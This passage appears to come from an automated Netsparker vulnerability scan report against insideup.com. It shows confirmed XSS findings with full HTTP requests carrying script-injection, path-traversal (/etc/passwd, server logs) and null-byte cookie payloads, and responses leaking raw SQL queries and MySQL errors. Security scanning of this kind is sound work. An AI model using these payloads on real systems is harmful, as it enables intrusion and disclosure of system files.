on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005D7)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='%22--%3E%3C/..

Parameters

Parameter Type Value
catId GET 80011
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x0005D8)</script>

Request

GET /ppc/leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005D8)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:56 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3tom669iari6jqi8628d1ni0g6; path=/
Content-Length: 3383
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005D8)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/obtm00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005DB)%3C/script%3E

/ppc/leadflow/obtm00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005DB)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 80011
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x0005DB)</script>

Request

GET /ppc/leadflow/obtm00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005DB)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:26:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=7vdc26c0jbkcvb995b9mhtp0c1; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005DB)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/parl00/

/ppc/leadflow/parl00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0005D9)</script>

Request

GET /ppc/leadflow/parl00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005D9)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 